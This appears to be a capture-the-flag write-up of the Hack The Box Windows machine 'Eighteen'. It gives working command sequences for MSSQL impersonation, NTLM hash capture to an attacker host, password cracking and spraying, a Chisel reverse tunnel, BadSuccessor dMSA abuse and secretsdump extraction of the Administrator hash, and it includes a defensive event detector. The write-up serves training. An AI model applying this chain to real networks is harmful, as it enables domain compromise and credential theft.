> m4rt@CTF_ARCHIVE:~$


Hack The Box / WINDOWS / 2026-04-11

Hack The Box — Eighteen (Windows)

MSSQL impersonation and hash capture lead to web/admin and WinRM access, then BadSuccessor abuse with dMSA enables DCSync-style extraction of Administrator credentials.

Target

  • IP: 10.129.242.91

Machine information

As is common in real-life Windows penetration tests, you start the Eighteen box with credentials for the following account:

  • kevin / iNa2we6haRj2gaw!

Recon

sudo nmap -sC -sV 10.129.242.91 -p- -v
PORT     STATE SERVICE  VERSION
80/tcp   open  http     Microsoft IIS httpd 10.0
|_http-title: Did not follow redirect to http://eighteen.htb/
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Microsoft-IIS/10.0
1433/tcp open  ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RTM
| ms-sql-ntlm-info:
|   10.129.242.91:1433:
|     Target_Name: EIGHTEEN
|     NetBIOS_Domain_Name: EIGHTEEN
|     NetBIOS_Computer_Name: DC01
|     DNS_Domain_Name: eighteen.htb
|     DNS_Computer_Name: DC01.eighteen.htb
|     DNS_Tree_Name: eighteen.htb
|_    Product_Version: 10.0.26100
|_ssl-date: 2025-11-19T03:10:24+00:00; +7h00m03s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-11-19T02:14:55
| Not valid after:  2055-11-19T02:14:55
| MD5:   1777:393a:b18b:b5ff:2edd:cf7f:fb32:2dac
|_SHA-1: 28fb:d268:6296:f936:5b0c:0d7c:c8dc:b2d3:85ec:5512
| ms-sql-info:
|   10.129.242.91:1433:
|     Version:
|       name: Microsoft SQL Server 2022 RTM
|       number: 16.00.1000.00
|       Product: Microsoft SQL Server 2022
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
5985/tcp open  http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Add dc01.eighteen.htb and eighteen.htb to /etc/hosts.

MSSQL access and privilege context

mssqlclient.py -port 1433 'EIGHTEEN'/'kevin':'iNa2we6haRj2gaw!'@dc01.eighteen.htb

We get an MSSQL shell.

enum_impersonate
execute as   database   permission_name   state_desc   grantee   grantor
----------   --------   ---------------   ----------   -------   -------
b'LOGIN'     b''        IMPERSONATE       GRANT        kevin     appdev
exec_as_login appdev
enum_db
name                is_trustworthy_on
-----------------   -----------------
master                              0
tempdb                              0
model                               0
msdb                                1
financial_planner                   0

Capture MSSQL service hash

On the attacker machine:

sudo responder -I tun0

In the MSSQL shell:

EXEC master.sys.xp_dirtree '\\10.10.14.138\myshare',1, 1

We get:

[SMB] NTLMv2-SSP Client   : 10.129.242.91
[SMB] NTLMv2-SSP Username : EIGHTEEN\mssqlsvc
[SMB] NTLMv2-SSP Hash     : mssqlsvc::EIGHTEEN:ef133c02507f24bb[truncated]

Put the hash into a file named hash.

hashcat -a 0 ./hash /usr/share/wordlists/rockyou.txt

It does not crack.

Database enumeration and web credential recovery

Back to the MSSQL shell:

use financial_planner

Enumerate tables:

SELECT name FROM financial_planner..sysobjects WHERE xtype='U'
users
incomes
expenses
allocations
analytics
visits
select * from users;
  id   full_name   username   email                password_hash                                                                                            is_admin   created_at
----   ---------   --------   ------------------   ------------------------------------------------------------------------------------------------------   --------   ----------
1002   admin       admin      admin@eighteen.htb   pbkdf2:sha256:600000$AMtzteQIG7yAbZIa$0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133          1   2025-10-29 05:39:03

The stored value is a Werkzeug-style PBKDF2 hash (pbkdf2:sha256:iterations$salt$hexdigest). We can use a Python script to convert it into the format Hashcat expects for PBKDF2-HMAC-SHA256 (mode 10900). See the script convert_hash.py.
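The re-encoding is mechanical: keep the iteration count, base64 the salt and the raw digest. The block below is an added example, not the author's convert_hash.py; it performs that conversion on the admin row from the users table above and also shows how the web application itself verifies a candidate password against such a hash.

```python
import base64
import hashlib
import hmac

# Value from the users table above, in Werkzeug's generate_password_hash layout:
#   pbkdf2:<digest>:<iterations>$<salt>$<hex digest>
ADMIN_HASH = ("pbkdf2:sha256:600000$AMtzteQIG7yAbZIa$"
              "0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133")


def parse_werkzeug(stored):
    """Split a Werkzeug pbkdf2 hash into (digest name, iterations, salt, digest bytes)."""
    method, salt, hexdigest = stored.split("$", 2)
    tag, digest_name, iterations = method.split(":")
    if tag != "pbkdf2":
        raise ValueError("not a pbkdf2 hash: " + method)
    return digest_name, int(iterations), salt, bytes.fromhex(hexdigest)


def to_hashcat(stored):
    """Re-encode for hashcat mode 10900 (PBKDF2-HMAC-SHA256):
    sha256:<iterations>:<base64 salt>:<base64 digest>."""
    digest_name, iterations, salt, digest = parse_werkzeug(stored)
    if digest_name != "sha256":
        raise ValueError("mode 10900 covers sha256 only, got " + digest_name)
    return "sha256:%d:%s:%s" % (iterations,
                                base64.b64encode(salt.encode()).decode(),
                                base64.b64encode(digest).decode())


def verify(stored, password):
    """What the application's login does (Werkzeug check_password_hash): recompute
    PBKDF2 with the stored salt and iteration count and compare in constant time."""
    digest_name, iterations, salt, digest = parse_werkzeug(stored)
    candidate = hashlib.pbkdf2_hmac(digest_name, password.encode(), salt.encode(), iterations)
    return hmac.compare_digest(candidate, digest)


if __name__ == "__main__":
    print(to_hashcat(ADMIN_HASH))
```

The 600000-iteration work factor is what makes each guess cost the cracker as much as it costs the login form; the weakness here is the password, not the hash scheme.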

python3 convert_hash.py

We get:

sha256:600000:QU10enRlUUlHN3lBYlpJYQ==:BnOtkKC0r7GdZiM28Pzjqe3Qt7GRk3F74ozk1myIcTM=

Put it into a file named hash.

./hashcat/hashcat -a 0 ./hash ./rockyou.txt

We get:

sha256:600000:QU10enRlUUlHN3lBYlpJYQ==:BnOtkKC0r7GdZiM28Pzjqe3Qt7GRk3F74ozk1myIcTM=:iloveyou1

Go to http://eighteen.htb/. Go to the login page and sign in with:

  • admin:iloveyou1

WinRM access

Enumerate local users:

nxc mssql dc01.eighteen.htb -u 'kevin' -p 'iNa2we6haRj2gaw!' --local-auth --rid-brute | cut -d: -f 2 | cut -d \\ -f2 | tail -n +3 > users.txt
nxc winrm dc01.eighteen.htb -u users.txt -p 'iloveyou1'

We get:

WINRM       10.129.242.91   5985   DC01             [+] eighteen.htb\adam.scott:iloveyou1 (Pwn3d!)
evil-winrm -i dc01.eighteen.htb -u 'adam.scott' -p 'iloveyou1'

We get a PowerShell shell.

(Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion") | Select-Object -Property *
CurrentBuild              : 26100
CurrentBuildNumber        : 26100
CurrentMajorVersionNumber : 10
CurrentMinorVersionNumber : 0
CurrentType               : Multiprocessor Free
CurrentVersion            : 6.3
DisplayVersion            : 24H2
EditionID                 : ServerDatacenter
InstallationType          : Server Core
InstallDate               : 1742787493
LCUVer                    : 10.0.26100.4349
ProductName               : Windows Server 2025 Datacenter
ReleaseId                 : 2009
UBR                       : 4349

AD ACL finding and BadSuccessor path

Upload PowerView.ps1 (https://github.com/PowerShellMafia/PowerSploit/raw/master/Recon/PowerView.ps1) to the victim machine.

. .\PowerView.ps1
Find-InterestingDomainACL

We notice:

ObjectDN                : OU=Staff,DC=eighteen,DC=htb
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : CreateChild
ObjectAceType           : None
AceFlags                : None
AceType                 : AccessAllowed
InheritanceFlags        : None
SecurityIdentifier      : S-1-5-21-1152179935-589108180-1989892463-1604
IdentityReferenceName   : IT
IdentityReferenceDomain : eighteen.htb
IdentityReferenceDN     : CN=IT,OU=Staff,DC=eighteen,DC=htb
IdentityReferenceClass  : group

User adam.scott is a member of the IT group. Searching online, we find that when a principal holds CreateChild on an OU in a domain with a Windows Server 2025 domain controller, the BadSuccessor technique (abusing delegated Managed Service Accounts) becomes possible.

Check whether it is exploitable. Use Get-BadSuccessorOUPermissions.ps1 from https://github.com/akamai/BadSuccessor. Upload it to the victim machine.

. .\Get-BadSuccessorOUPermissions.ps1
Get-BadSuccessorOUPermissions
Identity    OUs
--------    ---
EIGHTEEN\IT {OU=Staff,DC=eighteen,DC=htb}

Since adam.scott is in the IT group, this looks exploitable.

Useful article:

  • https://www.akamai.com/blog/security-research/abusing-dmsa-for-privilege-escalation-in-active-directory
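From the defender's side, the chain described above is visible in the domain controller's Security log once object auditing is enabled on the OU: a 5137 entry for the dMSA creation and 5136 entries for the attribute writes (msDS-ManagedAccountPrecededByLink, msDS-DelegatedMSAState, msDS-GroupMSAMembership). The block below is an added example, not part of the page's tooling, that flags those events over constructed sample records; the field names follow the 5136/5137 event schema, while the migration allow-list and the privileged-DN watch-list are assumptions.

```python
# Object class and attributes the BadSuccessor chain writes (names from the tool output above).
DMSA_CLASS = "msDS-DelegatedManagedServiceAccount"
WATCHED_ATTRS = {"msDS-ManagedAccountPrecededByLink", "msDS-DelegatedMSAState",
                 "msDS-GroupMSAMembership"}
# Constructed allow-list of accounts expected to run a sanctioned dMSA migration,
# and constructed watch-list of DNs a dMSA must never be linked to.
MIGRATION_ADMINS = {"EIGHTEEN\\Administrator"}
PRIVILEGED_DNS = {"CN=Administrator,CN=Users,DC=eighteen,DC=htb"}

# Constructed sample events: Security log 5137 (object created) and 5136 (object
# modified) flattened to key=value fields, as a SIEM export might present them.
SAMPLE_EVENTS = """\
EventID=5137 SubjectDomainName=EIGHTEEN SubjectUserName=adam.scott ObjectClass=msDS-DelegatedManagedServiceAccount ObjectDN=CN=kreep_dmsa,OU=Staff,DC=eighteen,DC=htb
EventID=5136 SubjectDomainName=EIGHTEEN SubjectUserName=adam.scott ObjectClass=msDS-DelegatedManagedServiceAccount ObjectDN=CN=kreep_dmsa,OU=Staff,DC=eighteen,DC=htb AttributeLDAPDisplayName=msDS-ManagedAccountPrecededByLink AttributeValue=CN=Administrator,CN=Users,DC=eighteen,DC=htb
EventID=5136 SubjectDomainName=EIGHTEEN SubjectUserName=adam.scott ObjectClass=msDS-DelegatedManagedServiceAccount ObjectDN=CN=kreep_dmsa,OU=Staff,DC=eighteen,DC=htb AttributeLDAPDisplayName=msDS-DelegatedMSAState AttributeValue=2
EventID=5136 SubjectDomainName=EIGHTEEN SubjectUserName=Administrator ObjectClass=msDS-DelegatedManagedServiceAccount ObjectDN=CN=svc_web_dmsa,OU=Staff,DC=eighteen,DC=htb AttributeLDAPDisplayName=msDS-ManagedAccountPrecededByLink AttributeValue=CN=svc_web,OU=Staff,DC=eighteen,DC=htb
EventID=5137 SubjectDomainName=EIGHTEEN SubjectUserName=adam.scott ObjectClass=computer ObjectDN=CN=attackersystem,OU=Staff,DC=eighteen,DC=htb
"""


def parse_event(line):
    """Split 'key=value key=value ...'; values such as DNs keep their own '=' and ','."""
    return dict(token.split("=", 1) for token in line.split())


def detect(lines):
    """Return (severity, subject, object DN, reason) for every suspicious dMSA event."""
    findings = []
    for line in lines:
        if not line.strip():
            continue
        ev = parse_event(line)
        subject = ev["SubjectDomainName"] + "\\" + ev["SubjectUserName"]
        # Only dMSA objects matter here, and sanctioned migration admins are allowed.
        if ev.get("ObjectClass") != DMSA_CLASS or subject in MIGRATION_ADMINS:
            continue
        if ev["EventID"] == "5137":
            findings.append(("medium", subject, ev["ObjectDN"],
                             "dMSA created outside a sanctioned migration"))
        elif ev["EventID"] == "5136" and ev.get("AttributeLDAPDisplayName") in WATCHED_ATTRS:
            attr, value = ev["AttributeLDAPDisplayName"], ev.get("AttributeValue", "")
            # Linking the dMSA to a privileged account is the step that hands over its rights.
            critical = attr == "msDS-ManagedAccountPrecededByLink" and value in PRIVILEGED_DNS
            findings.append(("critical" if critical else "high", subject, ev["ObjectDN"],
                             attr + " set to " + value))
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS.splitlines()):
        print(*finding, sep=" | ")
```

The computer-account creation in the last sample line is deliberately not flagged: it is ordinary activity, whereas the earlier Get-BadSuccessorOUPermissions output is the preventive check, showing which principals should lose CreateChild on the OU before any of this is logged.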

Tooling attempts

I tried multiple tools to perform the exploit.

For example, there is a repository that automates the attack: https://github.com/logangoins/SharpSuccessor. It is a Visual Studio project. I compiled it on a Windows machine. Upload SharpSuccessor.exe to the victim machine.

.\SharpSuccessor.exe add /impersonate:Administrator /path:"OU=Staff,DC=eighteen,DC=htb" /account:adam_scott /name:attacker_dMSA

It does not work because it seems to require a machine account. We can create one like this:

$password = ConvertTo-SecureString "Summer2025!" -AsPlainText -Force
New-ADComputer -Name "attackersystem" -SamAccountName "attackersystem" -AccountPassword $password -Path "OU=Staff,DC=eighteen,DC=htb"

Then run SharpSuccessor.exe:

.\SharpSuccessor.exe add /impersonate:Administrator /path:"OU=Staff,DC=eighteen,DC=htb" /account:attackersystem$ /name:attacker_dMSA
[+] Adding dnshostname attacker_dMSA1.eighteen.htb
[+] Adding samaccountname attacker_dMSA1$
[+] Administrator's DN identified
[+] Attempting to write msDS-ManagedAccountPrecededByLink
[+] Wrote attribute successfully
[+] Attempting to write msDS-DelegatedMSAState attribute
[+] Attempting to set access rights on the dMSA object
[+] Attempting to write msDS-SupportedEncryptionTypes attribute
[+] Attempting to write userAccountControl attribute
[+] Created dMSA object 'CN=attacker_dMSA1' in 'OU=Staff,DC=eighteen,DC=htb'
[+] Successfully weaponized dMSA object
[+] Found target account, attempting to write attributes
[+] CN=attacker_dMSA1,OU=Staff,DC=eighteen,DC=htb written to Administrator object
[+] msDS-SupersededServiceAccountState set to 2
[!] Exception: Access is denied.

Unfortunately, it fails.

So I tried other tools. For example, I tried this BadSuccessor.exe build:

  • https://github.com/ibaiC/BadSuccessor/raw/refs/heads/main/BadSuccessor/obj/Debug/BadSuccessor.exe

Upload it to the victim machine.

.\BadSuccessor.exe find
[*] OUs you have write access to:
    -> OU=Domain Controllers,DC=eighteen,DC=htb
       Privileges: GenericWrite, GenericAll
    -> OU=Staff,DC=eighteen,DC=htb
       Privileges: GenericWrite, GenericAll, CreateChild
.\BadSuccessor.exe escalate -targetOU "OU=Staff,DC=eighteen,DC=htb" -dmsa kreep_dmsa -targetUser "CN=Administrator,CN=Users,DC=eighteen,DC=htb" -dnshostname kreep_dmsa -user adam.scott -dc-ip 10.129.242.91
[*] Creating dMSA object...
[*] Inheriting target user privileges
    -> msDS-ManagedAccountPrecededByLink = CN=Administrator,CN=Users,DC=eighteen,DC=htb
    -> msDS-DelegatedMSAState = 2
[+] Privileges Obtained.
[*] Setting PrincipalsAllowedToRetrieveManagedPassword
    -> msDS-GroupMSAMembership = adam.scott
[+] Setting userAccountControl attribute
[+] Setting msDS-SupportedEncryptionTypes attribute

[+] Created dMSA 'kreep_dmsa' in 'OU=Staff,DC=eighteen,DC=htb', linked to 'CN=Administrator,CN=Users,DC=eighteen,DC=htb' (DC: 10.129.242.91)

[*] Phase 4: Use Rubeus or Kerbeus BOF to retrieve TGS and Password Hash
    -> Step 1: Find luid of krbtgt ticket
     Rubeus:      .\Rubeus.exe triage
     Kerbeus BOF: krb_triage BOF

    -> Step 2: Get TGT of Windows 2025/24H2 system with a delegated MSA setup and migration finished.
     Rubeus:      .\Rubeus.exe dump /luid:<luid> /service:krbtgt /nowrap
     Kerbeus BOF: krb_dump /luid:<luid>

    -> Step 3: Use ticket to get a TGS ( Requires Rubeus PR: https://github.com/GhostPack/Rubeus/pull/194 )
    Rubeus:      .\Rubeus.exe asktgs /ticket:TICKET_FROM_ABOVE /targetuser:kreep_dmsa$ /service:krbtgt/domain.local /dmsa /dc:<DC hostname> /opsec /nowrap

At this point it is very convenient to use Impacket instead of Rubeus.exe. I still included the Rubeus.exe procedure in additional notes.

Chisel SOCKS setup and Kerberos path

To access victim open ports from the attacker machine, use Chisel in SOCKS proxy mode. Download Chisel (https://github.com/jpillora/chisel) and upload the Windows binary to the victim machine.

On the attacker machine:

./chisel_linux server -p 9999 --reverse

On the victim machine:

.\chisel_windows.exe client 10.10.14.138:9999 R:socks

Now edit /etc/proxychains4.conf and set:

socks5  127.0.0.1 1080

Comment out any other SOCKS proxy lines.

Now, for example, we can access SMB:

proxychains nxc smb 10.129.242.91 -d eighteen.htb -u 'adam.scott' -p 'iloveyou1'
SMB         10.129.242.91   445    DC01             [+] eighteen.htb\adam.scott:iloveyou1

Kerberos rejects requests when the clock skew is too large, and the nmap output above shows the DC's clock about 7 hours ahead of ours. To synchronize time with the server, we must forward NTP port 123 over UDP.

.\chisel_windows.exe client 10.10.14.138:9999 R:123/udp

We can also combine it with SOCKS:

.\chisel_windows.exe client 10.10.14.138:9999 R:socks R:123/udp

Now run:

sudo ntpdate 127.0.0.1

getST dMSA flow and Administrator hash

Impacket getST.py has a dmsa option:

proxychains getST.py eighteen.htb/adam.scott:iloveyou1 -impersonate 'kreep_dmsa$' -dc-ip 10.129.242.91 -self -dmsa
[*] Saving ticket in kreep_dmsa$@krbtgt_EIGHTEEN.HTB@EIGHTEEN.HTB.ccache
export KRB5CCNAME='kreep_dmsa$@krbtgt_EIGHTEEN.HTB@EIGHTEEN.HTB.ccache'
proxychains nxc smb 10.129.242.91 -d eighteen.htb -k --use-kcache
SMB         10.129.242.91     445    DC01             [+] eighteen.htb\kreep_dmsa$ from ccache (Pwn3d!)

At this point we can use secretsdump.py:

proxychains secretsdump.py -k -no-pass -just-dc-user Administrator 'eighteen.htb'/'kreep_dmsa$'@dc01.eighteen.htb
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0b133be956bfaddf9cea56701affddec:::
[*] Kerberos keys grabbed
Administrator:0x14:977d41fb9cb35c5a28280a6458db3348ed1a14d09248918d182a9d3866809d7b
Administrator:0x13:5ebe190ad8b5efaaae5928226046dfc0
Administrator:aes256-cts-hmac-sha1-96:1acd569d364cbf11302bfe05a42c4fa5a7794bab212d0cda92afb586193eaeb2
Administrator:aes128-cts-hmac-sha1-96:7b6b4158f2b9356c021c2b35d000d55f
Administrator:0x17:0b133be956bfaddf9cea56701affddec
evil-winrm -i 10.129.242.91 -u Administrator -H '0b133be956bfaddf9cea56701affddec'

We get a PowerShell shell as Administrator.

Additional notes

Note 1

Here is the Rubeus.exe procedure to complete the BadSuccessor exploit. Upload Rubeus.exe (https://github.com/Flangvik/SharpCollection/raw/refs/heads/master/NetFramework_4.7_x64/Rubeus.exe) to the victim machine.

.\Rubeus.exe asktgt /user:adam.scott /password:iloveyou1 /enctype:AES256 /outfile:ticket.kirbi
.\Rubeus.exe asktgs /ticket:ticket.kirbi /targetuser:kreep_dmsa$ /service:krbtgt/eighteen.htb /dmsa /dc:dc01.eighteen.htb /opsec /nowrap /outfile:tgs

We get a tgs file with the ticket.

.\Rubeus.exe asktgs /user:kreep_dmsa$ /service:cifs/dc01.eighteen.htb /opsec /dmsa /nowrap /ticket:tgs /outfile:tgs_final

Copy tgs_final to our machine. We can do this with smbserver:

smbserver.py -smb2support -username test12 -password test12 share $(pwd)

On the victim machine run:

net use \\10.10.14.138\share test12 /USER:test12
cp tgs_final \\10.10.14.138\share\

On our machine, convert the ticket:

ticketConverter.py tgs_final tgs_final.ccache
export KRB5CCNAME='tgs_final.ccache'

Now, with Chisel still active in SOCKS mode, run:

proxychains nxc smb 10.129.242.91 -d eighteen.htb -k --use-kcache
SMB         10.129.242.91     445    DC01             [+] eighteen.htb\kreep_dmsa$ from ccache (Pwn3d!)

And now we can use secretsdump.py:

proxychains secretsdump.py -k -no-pass -just-dc-user Administrator 'eighteen.htb'/'kreep_dmsa$'@dc01.eighteen.htb

Note 2

I tried several ways to perform the BadSuccessor exploit. One approach was taken directly from the article:

  • https://www.akamai.com/blog/security-research/abusing-dmsa-for-privilege-escalation-in-active-directory

New-ADServiceAccount -Name "attacker_dMSA" -DNSHostName "dontcare.com" -CreateDelegatedServiceAccount -PrincipalsAllowedToRetrieveManagedPassword "adam.scott" -path "OU=Staff,DC=eighteen,DC=htb"

$dMSA = [ADSI]"LDAP://CN=attacker_dMSA,OU=Staff,DC=eighteen,DC=htb"
$dMSA.Put("msDS-DelegatedMSAState", 2)
$dMSA.Put("msDS-ManagedAccountPrecededByLink", "CN=Administrator,CN=Users,DC=eighteen,DC=htb")
$dMSA.SetInfo()

However, an error occurs here. It seems we do not have permission to modify that Active Directory attribute.